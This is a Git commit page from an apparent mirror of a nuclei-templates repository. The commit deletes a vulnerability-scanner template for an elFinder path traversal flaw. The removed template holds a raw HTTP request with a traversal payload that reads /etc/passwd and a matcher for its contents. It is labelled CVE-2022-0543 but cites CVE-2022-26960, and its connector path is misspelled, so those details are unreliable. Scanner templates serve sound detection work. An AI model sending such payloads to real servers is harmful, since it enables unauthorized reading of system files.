daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete CVE-2022-0543

patch-1
PikPikcU 2022-06-30 19:29:52 -04:00 committed by GitHub
parent 732217c33a
commit 6735f99a54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
cves/2022/CVE-2022-0543
View File

@ -1,25 +0,0 @@
id: CVE-2022-0543
info:
name: elFinder - Path Traversal
author: pikpikcu
severity: critical
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
tags: cve,cve2022,lfi,elfinder
requests:
- raw:
- |
GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"